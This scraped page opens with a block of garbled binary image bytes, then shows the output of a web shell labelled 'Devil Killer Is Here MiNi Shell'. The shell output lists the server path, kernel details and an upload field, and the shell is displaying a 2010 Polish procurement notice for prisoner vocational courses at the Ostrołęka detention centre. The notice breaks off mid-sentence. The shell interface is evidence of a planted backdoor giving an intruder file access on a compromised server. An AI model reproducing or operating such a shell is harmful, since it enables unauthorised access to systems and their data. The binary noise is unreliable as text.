JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100416/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100416/86595-N-2010.html

<p class="kh_header"><b>Ostrołęka: Przeprowadzenie kursów</b><br>
<b>Numer ogłoszenia: 86595 - 2010; data zamieszczenia: 16.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Ostrołęce , ul. Romualda Traugutta 19, 07-410 Ostrołęka, woj. mazowieckie, tel. 0-29 760 52 11, faks 0-29 760 52 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka penitencjarna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE 1A

1A) Kurs komputerowy Gospodarka magazynowa z fakturowaniem

Miejsce realizacji: teren zamawiającego - Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce,
Przytuły Stare 13 A, 07-411 Rzekuń;
Termin realizacji: zakończenie realizacji przedmiotu zamówienia do 12.06.2010 r.;
Liczebność grupy: 12 osób;
Liczba godzin szkoleniowych: 120 godz. lekcyjnych 
Wykonawca przed rozpoczęciem zajęć przeprowadzi badania lekarskie uczestników kursu na 
koszt własny i przedstawi Zamawiającemu stosowne zaświadczenia (12 osób+ 2 osoby z listy
rezerwowej) informujące o dopuszczeniu do kursu każdego uczestnika;
Wykonawca ubezpieczy uczestników (12 osób + 2 osoby z listy rezerwowej) od następstw
nieszczęśliwych wypadków na czas trwania kursu w niezbędnym; 
Wykonawca powinien spełniać warunki określone w § 1 ust. 2 Rozporządzenia Ministra Edukacji 
i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania uzupełniania przez osoby dorosłe wiedzy
ogólnej, umiejętności i kwalifikacji i zawodowych w formach pozaszkolnych - wymagane 
oświadczenie;
Wykonawca winien być wpisany do rejestru instytucji szkoleniowych  - wymagane 
zaświadczenie;
Wykonawca zobowiązany będzie zapoznać się i  przeprowadzić kurs zgodnie 
z Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie 
szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych - wymagane oświadczenie;
Wykonawca zobowiązany będzie do wyrażenia zgody na przetwarzanie danych 
osobowych dla potrzeb niezbędnych do realizacji, sprawozdawczości i kontroli
projektu - zgodnie z Ustawą o ochronie danych osobowych - wymagane oświadczenie;
Wykonawca zobowiązany będzie zachować w tajemnicy i nie ujawniać danych osobowych, do których Wykonawca uzyskał dostęp w związku z uczestnictwem w projekcie - wymagane oświadczenie;
Wykonawca załączy do swojej oferty program kursu, który powinien być zgodny  z wymaganiami określonymi w przepisie § 32 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315) oraz wzór zaświadczenia o ukończeniu kursu.
Zamawiający i Wykonawca przed rozpoczęciem kursu ustalą harmonogram określający dni i godziny prowadzenia zajęć;
Wykonawca zobowiązany będzie do przygotowania i prowadzenia dokumentacji kursu, która powinna być zgodna z wymaganiami określonymi w przepisie § 32 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315);
Wykonawca każdemu uczestnikowi przekaże komplet materiałów szkoleniowych 
(skrypt/podręcznik, notatnik, długopis) i jeden dodatkowy komplet zamawiającemu. 
Zamawiający zapewni pomieszczenie wyposażone w 11 stanowisk komputerowych, rzutnik multimedialny, drukarkę, kopiarkę - sprzęt zakupiony w ramach projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego;
Wykonawca zobowiązany będzie zapewnić jedno stanowisko komputerowe laptop 
dla dwunastego uczestnika oraz odpowiedni program komputerowy dla uczestników 
z zakresu tematyki kursu komputerowego;
Wykonawca zobowiąże się do umieszczenia informacji o współfinansowaniu ze środków
Unii Europejskiej w ramach Europejskiego Funduszu Społecznego wraz odpowiednimi 
logotypami na wszystkich dokumentach w ramach kursu oraz materiałach szkoleniowych,
zgodnie z Załącznikiem nr 1 do Planu Komunikacji POKL (Wytyczne dotyczące oznakowania
projektów w ramach Programu Operacyjnego Kapitał Ludzki znajduję się na stronie internetowej
Centrum Rozwoju Zasobów Ludzkich -www.crzl.gov.pl);
Wykonawca zobowiązany będzie przeprowadzić egzamin i wydać zaświadczenia uczestnikom
wg wzorów wynikających z Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego  2006 r.
w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i 
kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216);
Wydane absolwentom dokumenty ukończenia kursu winny zawierać informację o realizowaniu 
kursu w ramach projektu współfinansowanego ze środków Unii Europejskiej w ramach
Europejskiego Funduszu Społecznego; 
Wykonawca zapewni wykładowców/instruktorów posiadających kwalifikacje do przeprowadzenia
kursu;
Wykonawcy zostanie wypłacona należność na rachunek bankowy na podstawie prawidłowo 
wystawionej faktury VAT (rachunku) oraz po przekazaniu dokumentacji kursowej  oraz protokołu
odbioru wykonania przedmiotu zamówienia;
Wykonawca zobowiązany będzie do przechowywania dokumentacji szkoleniowej 
do końca 2020 r.;
Wykonawca zobowiązany będzie do umożliwienia uprawnionym instytucjom zewnętrznym 
kontroli kursu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego
Funduszu Społecznego w zakresie i na zasadach wynikających z obowiązujących przepisów.


  Założenia organizacyjne

kursu Komputerowego 
Gospodarka magazynowa z fakturowaniem 
dla osób odbywających karę pozbawienia wolnośći

Celem kursu jest teoretyczne i praktyczne przygotowanie osób pozbawionych wolności do pracy w zawodzie zgodnym z tematyką kursu oraz nabycie umiejętności zawodowych.
1)Liczebność grupy: 12 osób.
2)Realizacja: 
zakończenie realizacji przedmiotu zamówienia do 12.06.2010 r.; 
1.Dokładny termin realizacji kursu oraz harmonogram prowadzenia zajęć zostanie uzgodniony z Wykonawcą.
3)Miejsce realizacji: 
Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce w Przytułach Starych ( Zamawiający zastrzega sobie prawo zmiany miejsca przeprowadzenia kursu - Wykonawcy z tego tytułu nie przysługują jakiekolwiek roszczenia, zwłaszcza do podniesienia ceny) ;
Zamawiający zapewnia w zakresie przeprowadzenia zajęć w ramach kursu pomieszczenie wyposażone w 11 stanowisk komputerowych, które znajduje się na terenie zamawiającego oraz zapewnia korzystanie ze sprzętu zakupionego w ramach projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (rzutnik multimedialny, drukarka, kopiarka);
Wykonawca zapewni jedno stanowisko komputerowe laptop dla dwunastego uczestnika kursu oraz program komputerowy dla wszystkich uczestników z zakresu tematyki kursu komputerowego.
4)Liczba godzin szkoleniowych: 
120 godzin lekcyjnych, po 8 godzin dziennie;
Zajęcia odbywać się będą od poniedziałku do piątku, od godz. 9.00 do 16.00, z przerwą obiadową od 12.30 do 13.30.
5)Zakres kursu powinien obejmować zagadnienia m.in.:
a)Bezpieczeństwo i higiena pracy;
b)Gospodarka magazynowa;
c)Podstawy obsługi komputera;
d)Obsługa komputera w zakresie zastosowania programu komputerowego w gospodarce magazynowej;
e)Zasady wystawiania faktur. 
6)Kurs zakończy się egzaminem przeprowadzonym przez Wykonawcę oraz wydaniem zaświadczeń uczestnictwa.
7)Metodyka nauczania:
Wykład metodą seminaryjną z zastosowaniem środków informatycznych, 
Zajęcia praktyczne metodą ćwiczeń z zastosowaniem środków informatycznych.
Kod CPV - 80533200-1

Zadanie 2A
2A) Kurs Ogrodnik - zagospodarowanie terenów zielonych
Miejsce realizacji: teren zamawiającego - Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce,
Przytuły Stare 13 A, 07-411 Rzekuń;
Termin realizacji - zakończenie realizacji przedmiotu zamówienia do 12.06.2010 r.
Liczebność grupy: 14 osób;
Liczba godzin szkoleniowych: 120 godz. lekcyjnych (w tym zajęcia teoretyczne i praktyczne);
Wykonawca przed rozpoczęciem zajęć przeprowadzi badania lekarskie uczestników 
kursu na koszt własny i przedstawi Zamawiającemu stosowne zaświadczenia (14 osób + 2 
osoby z listy rezerwowej) informujące o dopuszczeniu do kursu każdego uczestnika;
Wykonawca ubezpieczy uczestników (14 osób + 2 osoby z listy rezerwowej) od następstw 
nieszczęśliwych wypadków na czas trwania kursu w niezbędnym zakresie przed rozpoczęciem
zajęć;  
Wykonawca powinien spełniać warunki określone w § 1 ust. 2 Rozporządzenia Ministra Edukacji
i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe
wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych - wymagane 
oświadczenie;
Wykonawca winien być wpisany do rejestru instytucji szkoleniowych  - wymagane 
zaświadczenie;
Wykonawca zobowiązany będzie zapoznać się i  przeprowadzić kurs zgodnie 
z Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie szczegółowych 
zasad i trybu prowadzenia nauczania w zakładach karnych;
Wykonawca zobowiązany będzie do wyrażenia zgody na przetwarzanie danych osobowych
dla potrzeb niezbędnych do realizacji, sprawozdawczości i kontroli projektu - zgodnie z Ustawą
o ochronie danych osobowych - wymagane oświadczenie;
Wykonawca zobowiązany będzie zachować w tajemnicy i nie ujawniać danych osobowych,
do których Wykonawca uzyskał dostęp w związku z uczestnictwem w projekcie - wymagane 
oświadczenie;
Wykonawca załączy do swojej oferty program kursu, który powinien być zgodny z wymaganiami
określonymi w przepisie § 32 rozporządzenia Ministra Pracy i Polityki Społecznej
z dnia 2 marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne
służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315) oraz wzór zaświadczenia 
o ukończeniu kursu;
Wykonawca zobowiązany będzie do przygotowania i prowadzenia dokumentacji kursu,
która powinna być zgodna z wymaganiami określonymi w przepisie § 32 Rozporządzenia
Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków
prowadzenia przez publiczne służby zatrudnienia usług rynku pracy;
Wykonawca wyposaży uczestników kursu w odzież ochronna i środki ochrony indywidualnej
na zajęcia praktyczne;
Zamawiający i Wykonawca przed rozpoczęciem kursu ustalą harmonogram określający dni
i godziny prowadzenia zajęć;
Wykonawca każdemu uczestnikowi przekaże komplet materiałów szkoleniowych 
(skrypt podręcznik, notatnik, długopis) i jeden dodatkowy komplet przekaże zamawiającemu;
Zamawiający zapewni pomieszczenie do przeprowadzenia kursu oraz sprzęt 
(szpadel - szt. 4 szt., kultywator - szt. 4 szt., grabie do liści - 4 szt., grabie ogrodowe - 4 szt.,
taczka ogrodowa 3 szt., wąż ogrodowy 50 m - 1 szt., zraszacz oscylacyjny - 1 szt., kosiarka
spalinowa - 1 szt., wyka szarka spalinowa - 1 szt.) zakupiony w ramach projektu
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu 
Społecznego;
Wykonawca zobowiązany będzie zapewnić materiały niezbędne do prawidłowego 
przeprowadzenia zajęć praktycznych w wysokości nie mniejszej niż 30% i nie większej 40%
kosztu ogólnego usługi szkoleniowej;
Wykonawca zobowiąże się do umieszczenia informacji o współfinansowaniu przez 
Unię Europejską w ramach Europejskiego Funduszu Społecznego wraz odpowiednimi
logotypami na wszystkich dokumentach w ramach kursu oraz materiałach szkoleniowych,
zgodnie z Załącznikiem nr 1 do Planu Komunikacji POKL (Wytyczne dotyczące oznakowania
projektów w ramach Programu Operacyjnego Kapitał Ludzki znajduję się na stronie internetowej
Centrum Rozwoju Zasobów Ludzkich - www.crzl.gov.pl);
Wykonawca zobowiązany będzie przeprowadzić egzamin i wydać zaświadczenia uczestnikom
wg wzorów wynikających z Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego  2006 r.
w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216);
Wydane absolwentom dokumenty ukończenia kursu winny zawierać informację
o realizowaniu szkolenia w ramach projektu współfinansowanego ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego;
Wykonawca zapewni wykładowców instruktorów posiadających kwalifikacje do przeprowadzenia
zajęć teoretycznych i praktycznych kursu;
Wykonawcy zostanie wypłacona należność na rachunek bankowy na podstawie prawidłowo
wystawionej faktury VAT (rachunku) oraz po przekazaniu dokumentacji kursowej  oraz protokołu
odbioru wykonania przedmiotu zamówienia;
Wykonawca zobowiązany będzie o przechowywania dokumentacji szkoleniowej 
do końca 2020 r.;
Wykonawca zobowiązany będzie do umożliwienia uprawnionym instytucjom zewnętrznym 
kontroli kursu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu
Społecznego w zakresie i na zasadach wynikających z obowiązujących przepisów.


Założenia organizacyjne

kursu Ogrodnik - zagospodarowanie terenów zielonych 
dla osób odbywających karę pozbawienia wolności

Celem kursu jest teoretyczne i praktyczne przygotowanie osób pozbawionych wolności do pracy w zawodzie zgodnym z tematyką kursu oraz nabycie umiejętności zawodowych.
1)Liczebność grupy: 14 osób
2)Realizacja: 
zakończenie realizacji przedmiotu zamówienia do 12.06.2010 r. 
1.Dokładny termin realizacji kursu oraz harmonogram prowadzenia zajęć zostanie uzgodniony z Wykonawcą,
3)Miejsce realizacji: 
Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce w Przytułach Starych ( Zamawiający zastrzega sobie prawo zmiany miejsca przeprowadzenia kursu - Wykonawcy z tego tytułu nie przysługują jakiekolwiek roszczenia, zwłaszcza do podniesienia ceny) ;
Zamawiający zapewnia miejsce do przeprowadzenia zajęć teoretycznych i praktycznych kursu.
4)Liczba godzin szkoleniowych: 
120 godzin lekcyjnych (w tym zajęcia teoretyczne praktyczne), po 8 godzin dziennie;
Zajęcia odbywać się będą od poniedziałku do piątku, od godz. 9.00 do 16.00, z przerwą obiadową od 12.30 do 13.30.
5)Zakres kursu powinien obejmować zagadnienia m.in.:
a)Przepisy BHP i ppoż. i ochrony środowiska, odzież ochronna, sprzęt ochrony osobistej,
b)Informacje z zakresu ogrodnictwa terenów zieleni:
Planowanie i wymiarowanie,
Projektowanie terenów zielonych,
Ochrona i pielęgnacja roślin,
Zasady rozmieszczania poszczególnych gatunków roślin, odmiana roślin,
Standardy odległości sadzenia roślin;
c)Przygotowanie terenu i gleby pod sadzenie i uprawę roślin; 
d)Sadzenie roślin, krzewów  i drzew;
e)Pielęgnacja rabat i kwietników;
f)Renowacja i pielęgnacja trawników;
g)Pielęgnacja drzew:
Rodzaje cięć;
Usuwanie odrostów;
h)Pielęgnacja krzewów;
i)Prace porządkowe.
6)Zamawiający zapewnia możliwość korzystania z sprzętu zakupionego w ramach projektu na zajęciach praktycznych (szpadel - szt. 4 szt., kultywator - szt. 4 szt., grabie do liści - 4 szt., grabie ogrodowe - 4 szt., taczka ogrodowa 3 szt., wąż ogrodowy 50 m - 1 szt., zraszacz oscylacyjny - 1 szt., kosiarka spalinowa - 1 szt., wyka szarka spalinowa - 1 szt.).
7)Wykonawca zapewni pozostały sprzęt i materiały dydaktyczne do zajęć praktycznych, które będą niezbędne do przeprowadzenia zajęć praktycznych.  
8)Kurs zakończy się egzaminem przeprowadzonym przez Wykonawcę oraz wydaniem zaświadczeń uczestnictwa.
9)Metodyka nauczania:
Wykład metodą seminaryjną z zastosowaniem środków informatycznych, 
Zajęcia praktyczne metodą wykonywania prac objętych kursem.
Kod Cpv - 80500000-9

Zadanie 1B 
1B) Zajęcia aktywizacyjne 
dla uczestników Kursu komputerowego Gospodarka magazynowa z fakturowaniem

Miejsce realizacji: teren zamawiającego - Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce,
Przytuły Stare 13 A, 07-411 Rzekuń;
Planowany termin realizacji: przed rozpoczęciem Kursu komputerowego Gospodarka 
magazynowa z fakturowaniem 
Liczebność grupy: uczestnicy Kursu komputerowego Gospodarka magazynowa 
z fakturowaniem;
Liczba godzin: łącznie 18 godz. lekcyjnych zajęć indywidualnych (12 godz.) 
i grupowych (6 godz.);
Wykonawca powinien spełniać warunki określone w § 1 ust. 2 Rozporządzenia Ministra Edukacji
i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy
ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych - wymagane 
oświadczenie;
Wykonawca winien być wpisany do rejestru instytucji szkoleniowych  - wymagane 
zaświadczenie;
Wykonawca zobowiązany będzie zapoznać się i  przeprowadzić zajęcia zgodnie 
z Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie 
szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych - wymagane
oświadczenie;
Wykonawca zobowiązany będzie do wyrażenia zgody na przetwarzanie danych osobowych
dla potrzeb niezbędnych do realizacji, sprawozdawczości i kontroli projektu - zgodnie z Ustawą
o ochronie danych osobowych - wymagane oświadczenie;
Wykonawca zobowiązany będzie zachować w tajemnicy i nie ujawniać danych osobowych,
do których Wykonawca uzyskał dostęp w związku z uczestnictwem w projekcie - wymagane
oświadczenie;
Wykonawca załączy do swojej oferty program zajęć aktywizacyjnych, który powinien być zgodny
z wymaganiami określonymi w przepisie § 32 rozporządzenia Ministra Pracy i Polityki 
Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków prowadzenia
przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315) oraz wzór 
zaświadczenia o ukończeniu zajęć;
Zamawiający i Wykonawca przed rozpoczęciem zajęć aktywizacyjnych ustalą harmonogram
określający dni i godziny prowadzenia zajęć;
Zamawiający zapewni pomieszczenie wyposażone w 11 stanowisk komputerowych, rzutnik
multimedialny, drukarkę, kopiarkę - sprzętu zakupionego w ramach projektu 
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu
Społecznego;
Wykonawca przed rozpoczęciem zajęć ubezpieczy uczestników zajęć od następstw 
nieszczęśliwych wypadków na czas trwania zajęć aktywizacyjnych w niezbędnym zakresie;
Wykonawca zobowiązany będzie do przygotowania i prowadzenia dokumentacji zajęć, która 
powinna być zgodna z wymaganiami określonymi w przepisie § 32 Rozporządzenia Ministra 
Pracy i Polityki Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków
prowadzenia przez publiczne służby zatrudnienia usług rynku pracy;
Wykonawca każdemu uczestnikowi przekaże komplet materiałów do pracy na zajęciach
 (skrypt podręcznik, notatnik, długopis) i jeden komplet przekaże zamawiającemu;
Wykonawca zobowiąże się do umieszczenia informacji o współfinansowaniu ze środków
Unii Europejskiej w ramach Europejskiego Funduszu Społecznego wraz odpowiednimi 
logotypami na wszystkich dokumentach w ramach zajęć aktywizacyjnych oraz materiałach
dydaktycznych, zgodnie z Załącznikiem nr 1 do Planu Komunikacji POKL (Wytyczne dotyczące
oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki znajduję się na 
stronie internetowej Centrum Rozwoju Zasobów Ludzkich -www.crzl.gov.pl);
Wykonawca zapewni przeprowadzenie zajęć aktywizacyjnych przez doradcę zawodowego;
Wykonawca zobowiązany będzie wydać uczestnikom zaświadczenie, na koniec zajęć 
aktywizacyjnych, potwierdzające udział w zajęciach,  wg wzorów  wynikających 
z Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego  2006 r. w sprawie uzyskania
i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych
w formach pozaszkolnych (Dz. U. Nr 31, poz. 216);
Wykonawcy zostanie wypłacona należność na rachunek bankowy na podstawie prawidłowo
wystawionej faktury VAT (rachunku) oraz po przekazaniu dokumentacji z zajęć  oraz protokołu
odbioru wykonania przedmiotu zamówienia;
Wykonawca zobowiązany będzie o przechowywania dokumentacji z zrealizowanych zajęć
do końca 2020 r.;
Wykonawca zobowiązany będzie do umożliwienia uprawnionym instytucjom zewnętrznym
kontroli zajęć aktywizacyjnych współfinansowanych przez Unię Europejską w ramach 
Europejskiego Funduszu Społecznego w zakresie i na zasadach wynikających z obowiązujących 
przepisów.


Zadanie 2B
2B) Zajęcia aktywizacyjne 
dla uczestników Kursu Ogrodnik - zagospodarowanie terenów zielonych

Miejsce realizacji: teren zamawiającego - Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce,
Przytuły Stare 13 A, 07-411 Rzekuń;
Planowany termin realizacji - przed rozpoczęciem Kursu Ogrodnik - zagospodarowanie terenów
zielonych;
Liczebność grupy: uczestnicy Kursu Ogrodnik - zagospodarowanie terenów zielonych; 
Liczba godzin: łącznie 20 godz. lekcyjnych zajęć indywidualnych (14 godz.) i grupowych 
(6 godz.);
Wykonawca powinien spełniać warunki określone w § 1 ust. 2 Rozporządzenia Ministra Edukacji
i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe
wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych - wymagane
oświadczenie; 
Wykonawca winien być wpisany do rejestru instytucji szkoleniowych  - wymagane
zaświadczenie;
Wykonawca zobowiązany będzie zapoznać się i  przeprowadzić zajęcia zgodnie 
z Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie szczegółowych
zasad i trybu prowadzenia nauczania w zakładach karnych - wymagane oświadczenie;
Wykonawca zobowiązany będzie do wyrażenia zgody na przetwarzanie danych osobowych
dla potrzeb niezbędnych do realizacji, sprawozdawczości i kontroli projektu
- zgodnie z Ustawą o ochronie danych osobowych - wymagane oświadczenie;
Wykonawca zobowiązany będzie zachować w tajemnicy i nie ujawniać danych
osobowych, do których Wykonawca uzyskał dostęp w związku z uczestnictwem
w projekcie - wymagane oświadczenie;
Wykonawca załączy do swojej oferty program zajęć aktywizacyjnych, który powinien być
zgodny z wymaganiami określonymi w przepisie § 32 rozporządzenia Ministra Pracy i Polityki
Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków prowadzenia
przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315)
oraz wzór zaświadczenia o ukończeniu zajęć;
Zamawiający i Wykonawca przed rozpoczęciem zajęć aktywizacyjnych ustalą harmonogram
określający dni i godziny prowadzenia zajęć;
Zamawiający zapewni pomieszczenie wyposażone w 11 stanowisk komputerowych, rzutnik
multimedialny, drukarkę, kopiarkę - sprzętu zakupionego w ramach projektu 
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego 
Funduszu Społecznego;
Wykonawca przed rozpoczęciem zajęć ubezpieczy uczestników zajęć od następstw 
nieszczęśliwych wypadków na czas trwania zajęć aktywizacyjnych w niezbędnym zakresie;

Wykonawca zobowiązany będzie do przygotowania i prowadzenia dokumentacji zajęć,
która powinna być zgodna z wymaganiami określonymi w przepisie § 32 Rozporządzenia 
Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków
prowadzenia przez publiczne służby zatrudnienia usług rynku pracy;
Wykonawca każdemu uczestnikowi przekaże komplet. materiałów do pracy na zajęciach
